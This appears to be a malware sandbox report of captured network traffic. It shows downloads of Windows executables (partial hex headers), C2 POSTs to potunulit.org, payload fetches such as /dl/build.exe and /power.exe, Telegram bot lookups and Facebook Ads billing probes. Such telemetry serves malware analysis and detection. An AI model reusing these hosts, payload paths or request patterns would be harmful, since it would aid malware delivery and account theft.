                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 May 2023 08:43:19 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40Last-Modified: Sun, 28 May 2023 08:40:04 GMTETag: "c3e00-5fcbceaa1bec3"Accept-Ranges: bytesContent-Length: 802304Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 26 ff f6 9e 62 9e 98 cd 62 9e 98 cd 62 9e 98 cd 7c cc 0d cd 7f 9e 98 cd 7c cc 1b cd 18 9e 98 cd 7c cc 1c cd 48 9e 98 cd 45 58 e3 cd 6b 9e 98 cd 62 9e 99 cd ea 9e 98 cd 7c cc 12 cd 63 9e 98 cd 7c cc 0c cd 63 9e 98 cd 7c cc 09 cd 63 9e 98 cd 52 69 63 68 62 9e 98 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d0 34 fa 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 4e 0a 00 00 28 26 00 00 00 00 00 59 4e 00 00 00 10 00 00 00 60 0a 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 a0 30 00 00 04 00 00 01 83 0c 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 88 51 0a 00 64 00 00 00 00 c0 2e 00 98 93 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 30 00 e4 0d 00 00 20 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 31 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 d4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 4a 4c 0a 00 00 10 00 00 00 4e 0a 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 58 24 00 00 60 0a 00 00 1e 00 00 00 52 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 98 93 01 00 00 c0 2e 00 00 94 01 00 00 70 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 38 00 00 00 60 30 00 00 3a 00 00 00 04 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 May 2023 08:43:31 GMTServer: Apache/2.4.37 (Win64) PHP/5.6.40Last-Modified: Sat, 31 Jul 2021 08:44:14 GMTETag: "2600-5c86757379380"Accept-Ranges: bytesContent-Length: 9728Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b1 8e c0 9c f5 ef ae cf f5 ef ae cf f5 ef ae cf ae 87 af ce f0 ef ae cf f5 ef af cf ff ef ae cf 6f 81 a7 ce f0 ef ae cf 6f 81 ac ce f4 ef ae cf 52 69 63 68 f5 ef ae cf 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 bc 80 04 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 12 00 00 00 12 00 00 00 00 00 00 fa 1a 00 00 00 10 00 00 00 30 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 00 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bc 3a 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 2c 02 00 00 d0 39 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ab 10 00 00 00 10 00 00 00 12 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 de 0b 00 00 00 30 00 00 00 0c 00 00 00 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 2c 02 00 00 00 50 00 00 00 04 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sun, 28 May 2023 08:43:34 GMTContent-Type: application/octet-streamContent-Length: 503808Last-Modified: Sun, 28 May 2023 08:40:03 GMTConnection: keep-aliveETag: "64731363-7b000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 26 ff f6 9e 62 9e 98 cd 62 9e 98 cd 62 9e 98 cd 7c cc 0d cd 7f 9e 98 cd 7c cc 1b cd 18 9e 98 cd 7c cc 1c cd 48 9e 98 cd 45 58 e3 cd 6b 9e 98 cd 62 9e 99 cd ea 9e 98 cd 7c cc 12 cd 63 9e 98 cd 7c cc 0c cd 63 9e 98 cd 7c cc 09 cd 63 9e 98 cd 52 69 63 68 62 9e 98 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 c3 cb 70 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 c4 05 00 00 24 26 00 00 00 00 00 59 4e 00 00 00 10 00 00 00 e0 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 2c 00 00 04 00 00 57 ac 08 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b8 c8 05 00 64 00 00 00 00 40 2a 00 98 93 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 2b 00 dc 0d 00 00 20 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 31 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 d4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7a c3 05 00 00 10 00 00 00 c4 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 58 24 00 00 e0 05 00 00 1e 00 00 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 98 93 01 00 00 40 2a 00 00 94 01 00 00 e6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 40 35 00 00 00 e0 2b 00 00 36 00 00 00 7a 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: GET /tmp/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: speedlab.com.eg
                Source: global trafficHTTP traffic detected: GET /tmp/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: speedlab.com.eg
                Source: global trafficHTTP traffic detected: GET /looking_glassbot HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
                Source: global trafficHTTP traffic detected: GET /tmp/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: speedlab.com.eg
                Source: global trafficHTTP traffic detected: GET /tmp/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: speedlab.com.eg
                Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing/ HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: adsmanager.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.62sec-ch-ua: "Microsoft Edge";v="111", "Not(A:Brand";v="8", "Chromium";v="111"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.62sec-ch-ua: "Microsoft Edge";v="111", "Not(A:Brand";v="8", "Chromium";v="111"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentHost: www.facebook.com
                Source: global trafficHTTP traffic detected: GET /looking_glassbot HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.meCookie: stel_ssid=638c97e8fa9f45a999_4963120488110758311
                Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing/ HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: adsmanager.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.62sec-ch-ua: "Microsoft Edge";v="111", "Not(A:Brand";v="8", "Chromium";v="111"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.62sec-ch-ua: "Microsoft Edge";v="111", "Not(A:Brand";v="8", "Chromium";v="111"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentHost: www.facebook.com
                Source: global trafficHTTP traffic detected: GET /looking_glassbot HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.meCookie: stel_ssid=638c97e8fa9f45a999_4963120488110758311
                Source: global trafficHTTP traffic detected: GET /looking_glassbot HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.meCookie: stel_ssid=638c97e8fa9f45a999_4963120488110758311
                Source: global trafficHTTP traffic detected: GET /tmp/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: shsplatform.co.uk
                Source: global trafficHTTP traffic detected: GET /looking_glassbot HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.meCookie: stel_ssid=638c97e8fa9f45a999_4963120488110758311
                Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing/ HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: adsmanager.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.62sec-ch-ua: "Microsoft Edge";v="111", "Not(A:Brand";v="8", "Chromium";v="111"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                Source: global trafficHTTP traffic detected: GET /looking_glassbot HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.meCookie: stel_ssid=638c97e8fa9f45a999_4963120488110758311
                Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.62sec-ch-ua: "Microsoft Edge";v="111", "Not(A:Brand";v="8", "Chromium";v="111"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentHost: www.facebook.com
                Source: global trafficHTTP traffic detected: GET /looking_glassbot HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.meCookie: stel_ssid=638c97e8fa9f45a999_4963120488110758311
                Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing/ HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: adsmanager.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.62sec-ch-ua: "Microsoft Edge";v="111", "Not(A:Brand";v="8", "Chromium";v="111"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.62sec-ch-ua: "Microsoft Edge";v="111", "Not(A:Brand";v="8", "Chromium";v="111"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentHost: www.facebook.com
                Source: global trafficHTTP traffic detected: GET /looking_glassbot HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.meCookie: stel_ssid=638c97e8fa9f45a999_4963120488110758311
                Source: global trafficHTTP traffic detected: GET /looking_glassbot HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.meCookie: stel_ssid=638c97e8fa9f45a999_4963120488110758311
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xlqkimn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mxltwpsqeo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 292Host: potunulit.org
                Source: global trafficHTTP traffic detected: GET /dl/build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: colisumy.com
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://csusaymthn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iviost.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wkqar.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dudvlk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 232Host: potunulit.org
                Source: global trafficHTTP traffic detected: GET /power.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.9.74.80
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qqiuoruppq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ybcrbcpvym.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: potunulit.org
                Source: global trafficHTTP traffic detected: GET /dl/build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: colisumy.com
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://negwl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 214Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sfmvlnbt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mbwheantep.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 121Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ajoab.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wjhcfonfk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ipame.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 270Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bxpeemr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 172Host: potunulit.org
